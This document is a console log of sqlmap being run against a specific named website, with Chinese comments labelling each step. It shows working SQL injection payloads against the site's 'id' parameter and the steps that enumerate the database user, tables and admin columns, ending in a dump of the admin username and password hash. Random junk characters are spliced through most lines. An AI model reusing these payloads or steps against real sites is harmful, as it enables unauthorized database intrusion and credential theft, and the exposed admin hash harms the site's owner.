D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
; v5 M0 g3 y3 K3 K2 m/ E/ x5 Mms "Mysql" --current-user /* 注解:获取当前用户名称
+ d3 v f. S/ q6 ~ sqlmap/0.9 - automatic SQL injection and database takeover tool
- u, V U) | U) } http://sqlmap.sourceforge.net starting at: 16:53:54. C* m" n7 E; \' J3 m _0 j' O
[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as6 m( Z1 y' U. f6 w& _
session file
1 G( J, d8 v# W4 N! j+ g[16:53:54] [INFO] resuming injection data from session file
. a- t/ i8 C% K* u! v$ J B5 o[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
% _6 @" x) R9 A5 {; k; T[16:53:54] [INFO] testing connection to the target url0 O3 f6 ^7 x' C' p
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
7 y7 o9 `: H; G; ~sts:8 w ~ L1 d, J# Q
---" b$ e, \8 F2 h3 I" p4 y# t
Place: GET G. W0 p! y# B
Parameter: id3 |- s- M. `' |1 u; q
Type: boolean-based blind: I, U% U- l6 }& v4 C
Title: AND boolean-based blind - WHERE or HAVING clause, f8 T4 T' |; Z3 V) m6 t
Payload: id=276 AND 799=799
' W0 [8 ?# Y! Q+ N7 n+ B1 h6 u Type: error-based
7 ?+ j) r- q8 \, F Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
8 E6 b3 C1 Y( ^5 V( i Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,6 M- ?# a" B$ h7 s8 u- m
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
; ~9 r. K9 C$ e5 K$ C),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
+ i5 G* s1 W& m$ v( V B Type: UNION query- W' N! a7 S4 p* H0 ^+ B0 O9 [
Title: MySQL UNION query (NULL) - 1 to 10 columns
0 s+ b" @, m) E6 m Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR( M# L* V+ u/ L+ Y
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
5 s, N. G' Y- G/ f8 ^% k$ yCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#% c" y. b7 w2 } P
Type: AND/OR time-based blind/ ~1 n4 v+ N* }0 ^2 W+ Z
Title: MySQL > 5.0.11 AND time-based blind" r5 T x% \ j4 j) {
Payload: id=276 AND SLEEP(5); ]6 F: z& p7 P1 a
---
6 L! Z6 z$ l, i% T2 }9 R[16:53:55] [INFO] the back-end DBMS is MySQL
+ J& r' r1 Q- Pweb server operating system: Windows
" E+ N$ s1 |1 [: S B# o7 ~web application technology: Apache 2.2.11, PHP 5.3.00 Z8 e0 T* C* u8 [1 v6 D( S
back-end DBMS: MySQL 5.0% V/ \3 S" `9 w, y# E
[16:53:55] [INFO] fetching current user
3 f; [9 E% {0 W; E6 V9 P. r) u, Lcurrent user: 'root@localhost' # X6 f E! c' h' H- f' O: T5 H
[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
& ]( N+ E! ]& N' z1 D; atput\www.wepost.com.hk' shutting down at: 16:53:581 k: v: k; H* @+ F/ O
- f4 G4 y; X! p' Q6 c3 p
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
+ C P/ ?: J3 E" u8 Pms "Mysql" --current-db /*当前数据库
5 s' _/ g# J, z8 g sqlmap/0.9 - automatic SQL injection and database takeover tool
+ u" N0 X& z8 d' ^1 Y http://sqlmap.sourceforge.net starting at: 16:54:165 }% H" `( A1 s) \" N5 q
[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as6 U; e' w! W, R) p }# v
session file1 p$ {7 z- H; t+ r& D
[16:54:16] [INFO] resuming injection data from session file
1 @' I) f9 y, u[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
3 Q- ^, S) D" m9 g& e$ Q[16:54:16] [INFO] testing connection to the target url5 `5 O+ X; ]8 N0 k b8 C' v3 K
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
s5 {- R) p! E( D$ `2 J; Lsts:
; p/ d2 C8 M' f- L---; t2 M- g: O! F: T1 D
Place: GET
: g) K% g4 m- C" ^7 x. s r; I% H5 _Parameter: id, K9 |6 F$ `' H
Type: boolean-based blind
4 Z4 x8 q5 ~* Q: z8 Q l Title: AND boolean-based blind - WHERE or HAVING clause& |# \' Y7 C. r/ e2 O
Payload: id=276 AND 799=7996 Y8 h. w! V3 g& c
Type: error-based; J. R5 R, Y, r: [
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause P3 C h0 n9 u! V
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,+ L5 A- }; x6 Z/ p k0 p8 g* T
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
7 ^/ N. O5 B4 v& _),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
9 Y% Y. x! I- H! X Type: UNION query
2 `) W! u3 I- J; [% G9 v Title: MySQL UNION query (NULL) - 1 to 10 columns
+ `# X0 U9 T2 |4 f Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
2 b9 N8 i0 L# g, V$ ~8 |9 V+ y8 }' L(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),0 e4 _2 E& ~/ h# F# v c6 O( D; N& W
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
, P9 Y5 p% z9 G Type: AND/OR time-based blind5 S/ [. u2 w$ t4 X$ R
Title: MySQL > 5.0.11 AND time-based blind4 J- J! c% x& Z) U* c! y' J
Payload: id=276 AND SLEEP(5)/ N+ K& ~& s9 V' l7 w2 \1 ?
---; B, t* `& d+ |2 u# G2 X
[16:54:17] [INFO] the back-end DBMS is MySQL# Q8 L9 y* C$ p+ N3 c
web server operating system: Windows& v- M% m2 b. |% }9 p+ s, m
web application technology: Apache 2.2.11, PHP 5.3.06 i# @; a; o7 M7 r$ _. G
back-end DBMS: MySQL 5.0
2 w; \" Q4 D# \5 d[16:54:17] [INFO] fetching current database2 E, m5 H8 c0 `! I/ ?# ?$ Z: B
current database: 'wepost'6 ?6 R' J9 o" I) S5 C0 Z6 L0 D7 g) s
[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
% A8 B7 P1 l1 @0 F+ [tput\www.wepost.com.hk' shutting down at: 16:54:18) H2 p3 Z( C6 P7 K- x$ z8 G/ ^
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db$ M+ Q1 @) z2 a: Y# v
ms "Mysql" --tables -D "wepost" /*获取当前数据库的表名
; _6 m- S# {5 U3 ^% D sqlmap/0.9 - automatic SQL injection and database takeover tool
; k7 F9 c @1 u4 ~" ] V/ d http://sqlmap.sourceforge.net starting at: 16:55:25
9 X& h+ y3 n8 i! V[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
0 a( F# @" E7 F* {5 j session file/ p5 R# _6 Z9 b) R
[16:55:25] [INFO] resuming injection data from session file
0 H6 U% f4 Z f# |( K5 F[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file* D- W% W+ T i" p
[16:55:25] [INFO] testing connection to the target url3 i) G7 a6 ^: k r$ ~
sqlmap identified the following injection points with a total of 0 HTTP(s) reque* Y' i, v' `7 d. V& \
sts:" O0 m$ n# [! J
---
" r+ A+ ~: y5 }( pPlace: GET
7 @2 |4 K' L* J) r4 v' R' A+ S! DParameter: id- {' y* m+ M$ l! ?9 f. g
Type: boolean-based blind& z, u$ J4 R( [+ T* a% V
Title: AND boolean-based blind - WHERE or HAVING clause
9 \; ] R: i$ C! H! |$ T- E( v Payload: id=276 AND 799=799
6 w9 I/ P3 X I- M4 `! M Type: error-based2 e/ h" z8 s' p6 e/ ^3 @5 F
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
: w# c* e3 M6 i/ ^+ x8 { Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
3 V7 a1 K4 M" B8 D$ h* {120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58" |" U% N) J |+ C8 A
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
9 g5 s; f# P; ~4 s$ @5 Q* x. T Type: UNION query
5 |8 x+ @) G( q' ? Title: MySQL UNION query (NULL) - 1 to 10 columns8 z* x& H3 l; ~: j
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
" ]: Y% u" K" k, \' O5 n; m(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR)," f& Y; Q- C# ]2 s6 V2 u
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#/ n! E6 l) y; K" ^9 d+ s6 ]
Type: AND/OR time-based blind
- @8 w! u! u( _6 N Title: MySQL > 5.0.11 AND time-based blind
% _) @0 q" p' u7 B# Z Payload: id=276 AND SLEEP(5)
# i+ s' Z4 a9 H o---; c* u' Y& t: a$ g2 R
[16:55:26] [INFO] the back-end DBMS is MySQL" g. q8 m: R6 P( ? A- [
web server operating system: Windows$ g9 r! q, K/ p1 E
web application technology: Apache 2.2.11, PHP 5.3.0! l$ f8 T3 ^9 E
back-end DBMS: MySQL 5.08 l, v6 Y7 S1 E9 g
[16:55:26] [INFO] fetching tables for database 'wepost'
) i. {; P3 S5 C4 f" i" d" v[16:55:27] [INFO] the SQL query used returns 6 entries& P- m0 W' B4 V) z- k
Database: wepost8 `* T1 C: I. a* B# F
[6 tables]+ W$ n$ D" ?! ~! J" ^
+-------------+
: \# R3 [4 P$ Z: n( r8 g3 B| admin |
/ B+ v$ S& r. ?5 l| article |
0 G5 f9 a* Q- d' h Q; ?$ L: D7 g# p3 e| contributor |9 t- c! X. X+ z2 v% Y3 o
| idea |
+ q9 s7 U; F* L8 B! F; B7 t| image |
% D) @7 P+ k! J: ]4 e$ || issue |
. [- P5 ~8 h- A8 F2 [8 k% P+-------------+
3 L0 L4 t9 h0 M2 |* W- p$ o[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
# C1 ?/ h: {" o0 M$ m7 xtput\www.wepost.com.hk' shutting down at: 16:55:33
$ {: g0 R" e! M. K8 d$ n" R# ~
' Z. J0 Z5 @6 G* P; xD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db8 n& X: V' u! N' o
ms "Mysql" --columns -T "admin" users-D "wepost" -v 0 /*获取admin表的字段名; _5 M# G2 o: D/ Q$ \# f
sqlmap/0.9 - automatic SQL injection and database takeover tool
3 G; V) c' e( ^- ^9 E http://sqlmap.sourceforge.net starting at: 16:56:06+ g- W- T) |- g" j h$ J2 A* t
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
) G' E+ H/ p( c" C; i; Fsts:
* V4 \8 I, K5 Q6 E3 E6 |& K---( h4 t. v5 d& Q) q- L
Place: GET: @0 P: D r2 w/ ]2 K) h
Parameter: id; l6 A9 p5 J @( T' z4 E: k; _
Type: boolean-based blind
6 M# W% z* @' L$ B Title: AND boolean-based blind - WHERE or HAVING clause: ?& {' ^4 Y9 q+ Y
Payload: id=276 AND 799=7991 Y# X) R/ B [
Type: error-based
8 D, q# W) R, n( m1 O( ? Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause. G8 R# r6 B0 {) m4 a# `3 T1 I1 [1 N
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,7 z6 F8 d7 c; m) j1 U
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
7 y3 o# X- \9 x- [5 B),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
$ Q: P; y# w3 I2 V Type: UNION query5 g: x* p* @# s$ u N
Title: MySQL UNION query (NULL) - 1 to 10 columns
) q4 H3 L8 M# u ` Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
; u$ e M( e2 X( i(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
l' C% I2 M, qCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
; d1 }' O! N+ X1 v/ C% r Type: AND/OR time-based blind; W4 e( K1 ?* R& ?1 O8 |
Title: MySQL > 5.0.11 AND time-based blind
/ G$ Q+ l. q% r, B& ^ Payload: id=276 AND SLEEP(5)+ m1 n Z# G8 U; B* c. i! F2 X+ J. k
---4 I5 ]5 \0 }/ \( i/ T
web server operating system: Windows3 F( W- r( `4 z- f; u+ J! u% J! J
web application technology: Apache 2.2.11, PHP 5.3.0' O' k. W8 I/ s+ x. }9 W
back-end DBMS: MySQL 5.0
x" h. G+ e* \; Q1 a[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\se
+ f5 m/ J) r. P2 ^! Q% z/ rssion': wepost, wepost$ J2 Z# l$ m9 N1 T, x
Database: wepost
9 k* c1 |1 o0 R3 l8 }; j8 l; ^+ N7 y0 ATable: admin
- \ E0 [/ n6 B+ O5 C[4 columns]9 m& z8 A1 c% r/ N F
+----------+-------------+: `& n# A$ r7 x( e9 ~1 E/ ~
| Column | Type |* L, i4 P5 H, p# a- B' G
+----------+-------------+
8 v. t+ w5 s1 Y. D: {5 x" C* O, || id | int(11) |! _4 y/ T+ w& B4 t* c$ k
| password | varchar(32) |
; I' p$ g) l& L' r! J5 p| type | varchar(10) |1 m4 g6 K- }" ?- @
| userid | varchar(20) |
4 n8 W. v* a) D# r8 |+----------+-------------+
, K2 m: `# @5 E) ~+ `& G E shutting down at: 16:56:19& {/ T- X2 X% j1 m- C2 N1 ]& c. w; D
3 e& I; Y) R& e, A; \/ F( |D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db% m ?% i* q: N5 J: \9 A
ms "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0 /*获取字段里面的内容: u e2 C8 t0 ?; |* V. T% u
sqlmap/0.9 - automatic SQL injection and database takeover tool; K" d: B! ]+ q
http://sqlmap.sourceforge.net starting at: 16:57:14
3 L+ f: ~2 x6 y; ~ K Fsqlmap identified the following injection points with a total of 0 HTTP(s) reque" o; A) B4 s+ V/ @/ v% q- V( T3 ~
sts:( F2 {2 v. ?7 g/ e8 ?
---
) r* X2 g4 G& `# W( o( f. xPlace: GET
+ A! r2 \3 S% w+ LParameter: id$ R: K5 [2 w" b: A; J
Type: boolean-based blind& Y/ }) J: E, b6 u. g
Title: AND boolean-based blind - WHERE or HAVING clause
% l! q$ v ^ Z5 o \# V Payload: id=276 AND 799=799# r$ w6 z- \- w2 [6 ^7 [/ d
Type: error-based
1 T2 Q' }7 ]8 [ R3 A Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
4 I& y, Q2 p# I8 t" w Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,% }5 A- y$ ?0 h; R; Z" i( e d
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,584 X) f+ j: P/ P& u0 Z- {3 ?
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
; E# I/ T3 T/ p$ y. T: W. F; |; m) Z3 N Type: UNION query: C G2 I- n/ {5 f$ w, U9 y
Title: MySQL UNION query (NULL) - 1 to 10 columns4 @$ v$ W$ A1 \
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
! n- {% q# L& V(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
; ?0 M2 N. ~! U5 ?# a1 nCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#8 ?: m. p9 L& ]
Type: AND/OR time-based blind
( w& ?, T6 f! E9 T0 h2 d Title: MySQL > 5.0.11 AND time-based blind+ \: P2 }+ N( [. k9 s* W
Payload: id=276 AND SLEEP(5)
$ I$ i. D. Y$ w---. U& A% V0 o( B, N# |# r# d
web server operating system: Windows6 ]7 z1 y3 W7 C! W: I R
web application technology: Apache 2.2.11, PHP 5.3.0
( y& `5 g, E6 r7 S' g7 P8 Nback-end DBMS: MySQL 5.0; q5 n3 H' ~+ `1 |5 m. `
recognized possible password hash values. do you want to use dictionary attack o" R, u1 ]3 T3 I' Y K/ { L
n retrieved table items? [Y/n/q] y
( P: L& ?& A4 ]7 wwhat's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]$ {. U: _. Z' C9 B+ d7 \7 x
do you want to use common password suffixes? (slow!) [y/N] y
; N, \/ P; _+ n) R, xDatabase: wepost
$ t5 h7 N+ p/ j. d, ?Table: admin4 X4 N. |' { v" ?/ U" K+ G
[1 entry]2 M; f5 ^6 d: i
+----------------------------------+------------+0 V h% s' O# V% y) }& V
| password | userid |% k2 v6 N5 T! \+ R5 Y8 v
+----------------------------------+------------+3 X) @8 |5 d, ]
| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |2 _! V( Q% |# w9 }
+----------------------------------+------------+. S; Z& D1 I# Y0 _* O& x3 q; B
shutting down at: 16:58:14
' U. O; t( h! X2 f9 ]4 y* h4 H
3 _7 z9 h I4 d$ I( R; e3 kD:\Python27\sqlmap> |